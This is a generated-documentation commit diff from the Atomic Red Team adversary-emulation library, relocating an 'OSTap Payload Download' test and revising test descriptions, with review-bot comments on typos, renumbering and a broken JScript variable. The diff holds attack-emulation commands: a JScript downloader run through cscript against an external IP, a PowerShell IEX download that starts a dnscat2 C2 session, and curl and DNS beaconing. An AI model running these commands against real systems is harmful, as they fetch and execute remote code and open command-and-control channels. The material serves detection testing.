Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-22 16:23:59 +00:00
parent 4a8ec3b1c7
commit ceafbf9c62
8 changed files with 174 additions and 150 deletions
+3 -3
@@ -534,8 +534,9 @@ execution,T1151,Space after Filename,1,Space After Filename
execution,T1154,Trap,1,Trap
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
execution,T1204,User Execution,2,Maldoc choice flags command execution
execution,T1204,User Execution,3,OSTAP JS version
execution,T1204,User Execution,2,OSTap Payload Download
execution,T1204,User Execution,3,Maldoc choice flags command execution
execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
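Review bot: inserting "OSTap Payload Download" as User Execution test #2 renumbers the existing "Maldoc choice flags command execution" and "OSTAP JS version" tests from 2/3 to 3/4, which silently breaks any external reference that used the old numbers (the generated markdown anchors, e.g. `#atomic-test-7---dns-c2` elsewhere in this diff, embed the test number). Appending the relocated test as #4 would keep existing numbers stable.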
@@ -637,7 +638,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
@@ -410,8 +410,9 @@ execution,T1216,Signed Script Proxy Execution,2,SyncAppvPublishingServer Signed
execution,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Script Command Execution
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
execution,T1204,User Execution,2,Maldoc choice flags command execution
execution,T1204,User Execution,3,OSTAP JS version
execution,T1204,User Execution,2,OSTap Payload Download
execution,T1204,User Execution,3,Maldoc choice flags command execution
execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
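Review bot: the second index file carries the same renumbering: "Maldoc choice flags command execution" and "OSTAP JS version" move from tests 2/3 to 3/4 because the relocated "OSTap Payload Download" is inserted as #2 instead of being appended, so both indexes and any saved links to the old numbers diverge at once.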
@@ -440,7 +441,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
+3 -3
@@ -810,8 +810,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: Maldoc choice flags command execution [windows]
- Atomic Test #3: OSTAP JS version [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -986,7 +987,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
@@ -676,8 +676,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: Maldoc choice flags command execution [windows]
- Atomic Test #3: OSTAP JS version [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -728,7 +729,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
+91 -79
@@ -9143,10 +9143,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
description: |
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
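Review bot: "successfuly" should be "successfully" in the new CheckIfInstallable description. The two sentences "the InstallUtil test harness will be executed" and "If no output is displayed the test executed successfully" could also be folded into one statement of what a successful run shows (no output), which is the pattern the other descriptions in this commit follow.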
@@ -9208,10 +9207,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
description: |
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
supported_platforms:
- windows
input_arguments:
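Review bot: "successfuly" should be "successfully" in the InstallHelper description; this text is rendered into the T1118 markdown further down in this commit, so the fix belongs in the source YAML rather than in the generated files.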
@@ -9275,7 +9273,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
'
supported_platforms:
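Review bot: "version information will be displayed the .NET framework install utility" is missing a word; it should read "displayed by the .NET Framework install utility". The identical sentence is repeated in the Install and both Uninstall variants below and in the rendered T1118 markdown, so fix it once at the source description.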
@@ -9341,7 +9340,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
description: 'Executes the Install Method
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9407,7 +9407,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9474,7 +9475,8 @@ defense-evasion:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9540,7 +9542,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
'
supported_platforms:
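Review bot: this is the HelpText method test, but the description still opens with "Executes the Uninstall Method" (carried over from the line it replaces). It should state that it invokes the HelpText method so the description matches the test name; the new "help information will be displayed for InstallUtil" sentence then follows naturally.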
@@ -9606,10 +9609,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
description: |
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
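Review bot: "opperation" should be "operation" in the evasive-invocation description. Quoting the exact strings "Running a transacted installation." and "The transacted install has completed." is a good choice, since they give a reader an unambiguous success marker to check the console against.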
@@ -22380,10 +22382,9 @@ execution:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
description: |
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
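Review bot: the `execution:` tactic section repeats the T1118 descriptions from the `defense-evasion:` section earlier in this diff, "successfuly" included. Since this file is generated, the wording fixes need to land once in the T1118 source YAML rather than in each generated copy.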
@@ -22445,10 +22446,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
description: |
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22512,7 +22512,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22578,7 +22579,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
description: 'Executes the Install Method
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22644,7 +22646,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22711,7 +22714,8 @@ execution:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22777,7 +22781,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
'
supported_platforms:
@@ -22843,10 +22848,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
description: |
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -25322,12 +25326,13 @@ execution:
identifier: T1204
atomic_tests:
- name: OSTap Style Macro Execution
description: "This Test uses a VBA macro to create and execute #{jse_path} with
cscript.exe. The .jse file in turn launches wscript.exe.\nExecution is handled
by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
to load and execute VBA code into Excel or Word documents.\n\nThis is a known
execution chain observed by the OSTap downloader commonly used in TrickBot
campaigns \nReferences:\n https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader\n"
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
@@ -25364,6 +25369,30 @@ execution:
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: Path
default: "%TEMP%\\OSTapGet.js"
file_url:
description: URL to retrieve file from
type: Url
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
- name: Maldoc choice flags command execution
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
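Review bot: the JScript written by the `echo` line never defines `filename` yet calls `stream.SaveToFile(filename, 1)`, so on a 200 response the script aborts with an undefined-variable error instead of writing the file (the `fso` object it creates is also never used). Declare the output path in the script, ideally as an input argument, and add it to `cleanup_command`, which currently only deletes `#{script_file}`. The default `file_url` is an HTTPS URL to a bare IP address; `MSXML2.ServerXMLHTTP` validates the server certificate, so unless that certificate covers the IP the request fails and the test exits 1 before the download path is exercised. The description "Uses cscript //E:jscript to download a file" also lacks the "Upon execution, ..." expected-output sentence that the rest of this commit adds to other tests.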
@@ -25400,9 +25429,9 @@ execution:
'
- name: OSTAP JS version
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
to load and execute VBA code into Excel or Word documents.\n"
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
@@ -29425,9 +29454,10 @@ command-and-control:
identifier: T1071
atomic_tests:
- name: Malicious User Agents - Powershell
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
description: "This test simulates an infected host beaconing to command and
control. Upon execution, no output will be displayed. \nUse an application
such as Wireshark to record the session and observe user agent strings and
responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
@@ -29444,9 +29474,10 @@ command-and-control:
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - CMD
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
description: "This test simulates an infected host beaconing to command and
control. Upon execution, no out put will be displayed. \nUse an application
such as Wireshark to record the session and observe user agent strings and
responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
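Review bot: "no out put" should be "no output" in the Malicious User Agents - CMD description; the same typo is rendered into the T1071 markdown later in this diff (the PowerShell variant just above has it spelled correctly).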
@@ -29457,10 +29488,10 @@ command-and-control:
executor:
name: command_prompt
command: |
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
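Review bot: appending `>nul 2>&1` to every curl line hides connection errors along with the response body, so an operator gets no signal whether the beacon attempts reached `#{domain}`. `-s` already suppresses the progress meter; `-sS` keeps the run quiet while still reporting failures on stderr, which matches the "no output will be displayed" wording without swallowing errors.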
@@ -29484,6 +29515,7 @@ command-and-control:
description: |
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
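Review bot: the unchanged context line above still reads "targe domain" ("target"); since this description is being edited in the same hunk, fix the typo at the same time. The same sentence is rendered into the T1071 markdown in this commit.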
@@ -29515,6 +29547,7 @@ command-and-control:
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29547,12 +29580,13 @@ command-and-control:
name: powershell
elevation_required: false
command: |
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
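Review bot: dropping the `$` turns `Set-Location PathToAtomicsFolder` into a literal relative path, so the command only works if the execution framework substitutes the `PathToAtomicsFolder` token before running it; anyone pasting the rendered T1071 markdown command (which shows the same literal) into a plain PowerShell session gets a path-not-found error. If token substitution is the intent, the generated docs should say so. The same change appears in the DNS Long Domain Query hunk below.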
@@ -29573,13 +29607,15 @@ command-and-control:
name: powershell
elevation_required: false
command: |
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
- name: DNS C2
description: |
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
supported_platforms:
- windows
@@ -29599,30 +29635,6 @@ command-and-control:
command: |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: Path
default: "%TEMP%\\OSTapGet.js"
file_url:
description: URL to retrieve file from
type: Url
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
T1032:
technique:
x_mitre_data_sources:
+17 -45
@@ -20,13 +20,13 @@ For connections that occur internally within an enclave (such as those between a
- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download)
<br/>
## Atomic Test #1 - Malicious User Agents - Powershell
This test simulates an infected host beaconing to command and control.
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -59,7 +59,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
## Atomic Test #2 - Malicious User Agents - CMD
This test simulates an infected host beaconing to command and control.
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -77,10 +79,10 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
```cmd
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
```
@@ -127,6 +129,7 @@ curl -s -A "*<|>*" -m3 #{domain}
## Atomic Test #4 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -160,6 +163,7 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #5 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -181,7 +185,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
```powershell
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -196,6 +200,7 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #6 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -214,7 +219,7 @@ The simulation involves sending DNS queries that gradually increase in length un
```powershell
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -229,7 +234,9 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #7 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
@@ -257,39 +264,4 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
<br/>
<br/>
## Atomic Test #8 - OSTap Payload Download
Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```cmd
del #{script_file} /F /Q >nul 2>&1
```
<br/>
+11 -8
@@ -26,7 +26,8 @@ Adversaries may use InstallUtil to proxy execution of code through a trusted Win
<br/>
## Atomic Test #1 - CheckIfInstallable method call
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil.
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
**Supported Platforms:** Windows
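Review bot: "successfuly" in the added line "If no output is displayed the test executed successfuly." is misspelled; it should read "successfully".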
@@ -101,7 +102,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - InstallHelper method call
Executes the InstallHelper class constructor runner instead of executing InstallUtil.
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
**Supported Platforms:** Windows
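Review bot: same misspelling as in test #1, "executed successfuly" should be "executed successfully"; also consider keeping the new sentence on one line so it matches the formatting of the other test descriptions in this file.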
@@ -178,7 +180,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #3 - InstallUtil class constructor method call
Executes the installer assembly class constructor.
Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
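Review bot: the added sentence "version information will be displayed the .NET framework install utility" is missing a preposition; it should read "version information will be displayed for the .NET framework install utility".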
@@ -255,7 +257,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #4 - InstallUtil Install method call
Executes the Install Method
Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
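Review bot: same wording defect as in test #3, "displayed the .NET framework install utility" should be "displayed for the .NET framework install utility".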
@@ -332,7 +334,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant
Executes the Uninstall Method
